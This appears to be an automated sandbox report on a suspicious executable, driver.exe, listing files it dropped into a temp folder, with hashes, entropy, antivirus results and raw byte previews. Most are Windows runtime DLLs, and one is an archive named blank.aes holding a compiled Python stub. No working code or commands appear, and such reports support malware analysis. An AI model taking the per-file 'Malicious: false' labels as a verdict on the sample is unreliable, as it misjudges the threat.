Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	5.146069394118203
Encrypted:	false
SSDEEP:	384:vUwidv3V0dfpkXc0vVaCsWqhWjCsa2IR9z5Bk5l:sHdv3VqpkXc0vVaP+U9zzk5l
MD5:	225D9F80F669CE452CA35E47AF94893F
SHA1:	37BD0FFC8E820247BD4DB1C36C3B9F9F686BBD50
SHA-256:	61C0EBE60CE6EBABCB927DDFF837A9BF17E14CD4B4C762AB709E630576EC7232
SHA-512:	2F71A3471A9868F4D026C01E4258AFF7192872590F5E5C66AABD3C088644D28629BA8835F3A4A23825631004B1AFD440EFE7161BB9FC7D7C69E0EE204813CA7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@.......J....`A........................................p...X............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.834520503429805
Encrypted:	false
SSDEEP:	192:etZ3xWqhWqWJWadJCsVWQ4mWfH/fKUSIX01k9z3AEXz40OY:etZ3xWqhWHCsMH2IR9z5OY
MD5:	1281E9D1750431D2FE3B480A8175D45C
SHA1:	BC982D1C750B88DCB4410739E057A86FF02D07EF
SHA-256:	433BD8DDC4F79AEE65CA94A54286D75E7D92B019853A883E51C2B938D2469BAA
SHA-512:	A954E6CE76F1375A8BEAC51D751B575BBC0B0B8BA6AA793402B26404E45718165199C2C00CCBCBA3783C16BDD96F0B2C17ADDCC619C39C8031BECEBEF428CE77
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......w....`A........................................p...x............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.916367637528538
Encrypted:	false
SSDEEP:	192:qaIMFSYWqhWzWJWadJCsVWQ4mW14LyttuX01k9z3A2ClV:qdYWqhWqCsISR9zfCT
MD5:	FD46C3F6361E79B8616F56B22D935A53
SHA1:	107F488AD966633579D8EC5EB1919541F07532CE
SHA-256:	0DC92E8830BC84337DCAE19EF03A84EF5279CF7D4FDC2442C1BC25320369F9DF
SHA-512:	3360B2E2A25D545CCD969F305C4668C6CDA443BBDBD8A8356FFE9FBC2F70D90CF4540F2F28C9ED3EEA6C9074F94E69746E7705E6254827E6A4F158A75D81065B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.829681745003914
Encrypted:	false
SSDEEP:	192:HNpWqhW5WJWadJCsVWQ4mWbZyttuX01k9z3A2qkFU:HXWqhW4Cs1SR9zf9U
MD5:	D12403EE11359259BA2B0706E5E5111C
SHA1:	03CC7827A30FD1DEE38665C0CC993B4B533AC138
SHA-256:	F60E1751A6AC41F08E46480BF8E6521B41E2E427803996B32BDC5E78E9560781
SHA-512:	9004F4E59835AF57F02E8D9625814DB56F0E4A98467041DA6F1367EF32366AD96E0338D48FFF7CC65839A24148E2D9989883BCDDC329D9F4D27CAE3F843117D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@............`A........................................p...H............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.612408827336625
Encrypted:	false
SSDEEP:	192:CWqhW+WJWadJCsVWQ4mWprgfKUSIX01k9z3AEXzh:CWqhW7Cs12IR9z5F
MD5:	0F129611A4F1E7752F3671C9AA6EA736
SHA1:	40C07A94045B17DAE8A02C1D2B49301FAD231152
SHA-256:	2E1F090ABA941B9D2D503E4CD735C958DF7BB68F1E9BDC3F47692E1571AAAC2F
SHA-512:	6ABC0F4878BB302713755A188F662C6FE162EA6267E5E1C497C9BA9FDDBDAEA4DB050E322CB1C77D6638ECF1DAD940B9EBC92C43ACAA594040EE58D313CBCFAE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.918215004381039
Encrypted:	false
SSDEEP:	192:OvMWqhWkWJWadJCsVWQ4mWoz/HyttuX01k9z3A21O:JWqhWxCs/SSR9zf1O
MD5:	D4FBA5A92D68916EC17104E09D1D9D12
SHA1:	247DBC625B72FFB0BF546B17FB4DE10CAD38D495
SHA-256:	93619259328A264287AEE7C5B88F7F0EE32425D7323CE5DC5A2EF4FE3BED90D5
SHA-512:	D5A535F881C09F37E0ADF3B58D41E123F527D081A1EBECD9A927664582AE268341771728DC967C30908E502B49F6F853EEAEBB56580B947A629EDC6BCE2340D8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......UJ....`A.........................................................0...............0..x&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26216
Entropy (8bit):	4.882777558752248
Encrypted:	false
SSDEEP:	192:I9cy5WqhWKWEXCVWQ4mW1pbm6yttuX01k9z3A2jyM:Ry5WqhWdcbmLSR9zfjj
MD5:	EDF71C5C232F5F6EF3849450F2100B54
SHA1:	ED46DA7D59811B566DD438FA1D09C20F5DC493CE
SHA-256:	B987AB40CDD950EBE7A9A9176B80B8FFFC005CCD370BB1CBBCAD078C1A506BDC
SHA-512:	481A3C8DC5BEF793EE78CE85EC0F193E3E9F6CD57868B813965B312BD0FADEB5F4419707CD3004FBDB407652101D52E061EF84317E8BD458979443E9F8E4079A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...U.gJ.........." .........@...............................................P............`A.........................................................@...............@..h&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.738587310329139
Encrypted:	false
SSDEEP:	192:TWqhWXWEXCVWQ4mWPXTNyttuX01k9z3A2dGxr:TWqhWMKASR9zfYxr
MD5:	F9235935DD3BA2AA66D3AA3412ACCFBF
SHA1:	281E548B526411BCB3813EB98462F48FFAF4B3EB
SHA-256:	2F6BD6C235E044755D5707BD560A6AFC0BA712437530F76D11079D67C0CF3200
SHA-512:	AD0C0A7891FB8328F6F0CF1DDC97523A317D727C15D15498AFA53C07610210D2610DB4BC9BD25958D47ADC1AF829AD4D7CF8AABCAB3625C783177CCDB7714246
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......h*....`A............................................"............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.202163846121633
Encrypted:	false
SSDEEP:	192:2pUEpnWlC0i5CBWqhWXLeWEXCVWQ4iW+/x6RMySX01k9z3Aza8Az629:2ptnWm5CBWqhWtWMR9zqaH629
MD5:	5107487B726BDCC7B9F7E4C2FF7F907C
SHA1:	EBC46221D3C81A409FAB9815C4215AD5DA62449C
SHA-256:	94A86E28E829276974E01F8A15787FDE6ED699C8B9DC26F16A51765C86C3EADE
SHA-512:	A0009B80AD6A928580F2B476C1BDF4352B0611BB3A180418F2A42CFA7A03B9F0575ED75EC855D30B26E0CCA96A6DA8AFFB54862B6B9AFF33710D2F3129283FAA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......M4....`A.........................................................0...............0..h&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.866983142029453
Encrypted:	false
SSDEEP:	192:0vh8Y17aFBRsWqhW9AWEXCVWQ4mWCB4Lrp0KBQfX01k9z3ALkg5Z7:SL5WqhW9boRxB+R9z2kM7
MD5:	D5D77669BD8D382EC474BE0608AFD03F
SHA1:	1558F5A0F5FACC79D3957FF1E72A608766E11A64
SHA-256:	8DD9218998B4C4C9E8D8B0F8B9611D49419B3C80DAA2F437CBF15BCFD4C0B3B8
SHA-512:	8DEFA71772105FD9128A669F6FF19B6FE47745A0305BEB9A8CADB672ED087077F7538CD56E39329F7DAA37797A96469EAE7CD5E4CCA57C9A183B35BDC44182F3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@............`A.........................................................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.828044267819929
Encrypted:	false
SSDEEP:	192:dUnWqhWRWJWadJCsVWQ4mW+2PyttuX01k9z3A23y:cWqhWQCsHSR9zf3y
MD5:	650435E39D38160ABC3973514D6C6640
SHA1:	9A5591C29E4D91EAA0F12AD603AF05BB49708A2D
SHA-256:	551A34C400522957063A2D71FA5ABA1CD78CC4F61F0ACE1CD42CC72118C500C0
SHA-512:	7B4A8F86D583562956593D27B7ECB695CB24AB7192A94361F994FADBA7A488375217755E7ED5071DE1D0960F60F255AA305E9DD477C38B7BB70AC545082C9D5E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@.......-....`A............................................e............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30328
Entropy (8bit):	5.14173409150951
Encrypted:	false
SSDEEP:	384:r7yaFM4Oe59Ckb1hgmLVWqhW2CsWNbZR9zQoekS:/FMq59Bb1jnoFT9zGp
MD5:	B8F0210C47847FC6EC9FBE2A1AD4DEBB
SHA1:	E99D833AE730BE1FEDC826BF1569C26F30DA0D17
SHA-256:	1C4A70A73096B64B536BE8132ED402BCFB182C01B8A451BFF452EFE36DDF76E7
SHA-512:	992D790E18AC7AE33958F53D458D15BFF522A3C11A6BD7EE2F784AC16399DE8B9F0A7EE896D9F2C96D1E2C8829B2F35FF11FC5D8D1B14C77E22D859A1387797C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P..x&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.883012715268179
Encrypted:	false
SSDEEP:	192:5eXrqjd7ZWqhW3WEXCVWQ4mW3Ql1Lrp0KBQfX01k9z3ALkjY/12:54rgWqhWsP1RxB+R9z2kjY/Y
MD5:	272C0F80FD132E434CDCDD4E184BB1D8
SHA1:	5BC8B7260E690B4D4039FE27B48B2CECEC39652F
SHA-256:	BD943767F3E0568E19FB52522217C22B6627B66A3B71CD38DD6653B50662F39D
SHA-512:	94892A934A92EF1630FBFEA956D1FE3A3BFE687DEC31092828960968CB321C4AB3AF3CAF191D4E28C8CA6B8927FBC1EC5D17D5C8A962C848F4373602EC982CD4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......N.....`A............................................x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26208
Entropy (8bit):	5.023753175006074
Encrypted:	false
SSDEEP:	192:4mGqX8mPrpJhhf4AN5/KiFWqhWyzWEXCVWQ4OW4034hHssDX01k9z3AaYX2cWo:4ysyr77WqhWyI0oFDR9z9YH9
MD5:	20C0AFA78836B3F0B692C22F12BDA70A
SHA1:	60BB74615A71BD6B489C500E6E69722F357D283E
SHA-256:	962D725D089F140482EE9A8FF57F440A513387DD03FDC06B3A28562C8090C0BC
SHA-512:	65F0E60136AB358661E5156B8ECD135182C8AAEFD3EC320ABDF9CFC8AEAB7B68581890E0BBC56BAD858B83D47B7A0143FA791195101DC3E2D78956F591641D16
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P......D!....`A............................................4............@...............@..`&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26232
Entropy (8bit):	5.289041983400337
Encrypted:	false
SSDEEP:	192:UuV2OlkuWYFxEpahfWqhWNWJWadJCsVWQ4mWeX9UfKUSIX01k9z3AEXzGd5S:dV2oFVhfWqhWMCstE2IR9z5Sd5S
MD5:	96498DC4C2C879055A7AFF2A1CC2451E
SHA1:	FECBC0F854B1ADF49EF07BEACAD3CEC9358B4FB2
SHA-256:	273817A137EE049CBD8E51DC0BB1C7987DF7E3BF4968940EE35376F87EF2EF8D
SHA-512:	4E0B2EF0EFE81A8289A447EB48898992692FEEE4739CEB9D87F5598E449E0059B4E6F4EB19794B9DCDCE78C05C8871264797C14E4754FD73280F37EC3EA3C304
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P............`A............................................a............@...............@..x&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26232
Entropy (8bit):	5.284932479906984
Encrypted:	false
SSDEEP:	384:tCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWqhWbQCsMSR9zful:tCV5yguNvZ5VQgx3SbwA71IkFGqHe9zI
MD5:	115E8275EB570B02E72C0C8A156970B3
SHA1:	C305868A014D8D7BBEF9ABBB1C49A70E8511D5A6
SHA-256:	415025DCE5A086DBFFC4CF322E8EAD55CB45F6D946801F6F5193DF044DB2F004
SHA-512:	B97EF7C5203A0105386E4949445350D8FF1C83BDEAEE71CCF8DC22F7F6D4F113CB0A9BE136717895C36EE8455778549F629BF8D8364109185C0BF28F3CB2B2CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P......\.....`A.........................................................@...............@..x&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.253102285412285
Encrypted:	false
SSDEEP:	192:mt3hwDGWqhWrWEXCVWQ4mWn+deyttuX01k9z3A23x:AWqhWgPSR9zfh
MD5:	001E60F6BBF255A60A5EA542E6339706
SHA1:	F9172EC37921432D5031758D0C644FE78CDB25FA
SHA-256:	82FBA9BC21F77309A649EDC8E6FC1900F37E3FFCB45CD61E65E23840C505B945
SHA-512:	B1A6DC5A34968FBDC8147D8403ADF8B800A06771CC9F15613F5CE874C29259A156BAB875AAE4CAAEC2117817CE79682A268AA6E037546AECA664CD4EEA60ADBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@.......&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.810971823417463
Encrypted:	false
SSDEEP:	192:p/fHQduDWqhWJWJWadJCsVWQ4mWxrnyttuX01k9z3A2Yv6WT:p/ftWqhWoCsmySR9zfYvvT
MD5:	A0776B3A28F7246B4A24FF1B2867BDBF
SHA1:	383C9A6AFDA7C1E855E25055AAD00E92F9D6AAFF
SHA-256:	2E554D9BF872A64D2CD0F0EB9D5A06DEA78548BC0C7A6F76E0A0C8C069F3C0A9
SHA-512:	7C9F0F8E53B363EF5B2E56EEC95E7B78EC50E9308F34974A287784A1C69C9106F49EA2D9CA037F0A7B3C57620FCBB1C7C372F207C68167DF85797AFFC3D7F3BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......^.....`A............................................^............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1396821
Entropy (8bit):	5.531015514770172
Encrypted:	false
SSDEEP:	12288:0W7WpzO6etYzGNcT1pz3YQfiBgDPtLwjFx278SAZQYF93BGfL+DuWFnjVpdxhYVd:l7WpzZSeT1xTYF9f5pdxhYVP05WdZ7
MD5:	18C3F8BF07B4764D340DF1D612D28FAD
SHA1:	FC0E09078527C13597C37DBEA39551F72BBE9AE8
SHA-256:	6E30043DFA5FAF9C31BD8FB71778E8E0701275B620696D29AD274846676B7175
SHA-512:	135B97CD0284424A269C964ED95B06D338814E5E7B2271B065E5EABF56A8AF4A213D863DD2A1E93C1425FADB1B20E6C63FFA6E8984156928BE4A9A2FBBFD5E93
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.+.P............._collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	111402
Entropy (8bit):	7.753948170787951
Encrypted:	false
SSDEEP:	1536:t92Wi8Vk9F8It7EH8U1qEYnLi96gJpqXqoJWhT2EkhYduSJ/uSiVxfx6TgEZ87oN:W8iM/AG9PYWhTFkh/mVIxf+NZQoJu2J
MD5:	1A11796F644617CB8BDFC56B2E9E3513
SHA1:	957DE7FEEB6790F0DE39B6F9A3908A555BB06828
SHA-256:	9D8B5FCDED7075D0AD60EBAFDB9C79B05DAB838D5D53C0300C853B92A13CF3D0
SHA-512:	4E5DB9C15B6F61D72EAAA192834CA14CB309E8770AA39F1CC1D1340BCEAAD8BDDFDBD369CC83733D8A05B63CA5A5FDB2D61BEE6C2B1DDE6407599EBAF34A9F8C
Malicious:	false
Reputation:	unknown
Preview:	PK.........R*Z..g............stub-o.pyc..........g...............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........

C:\Users\user\AppData\Local\Temp\_MEI57082\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1630488
Entropy (8bit):	7.952879310777133
Encrypted:	false
SSDEEP:	49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:	8377FE5949527DD7BE7B827CB1FFD324
SHA1:	AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:	88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:	C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
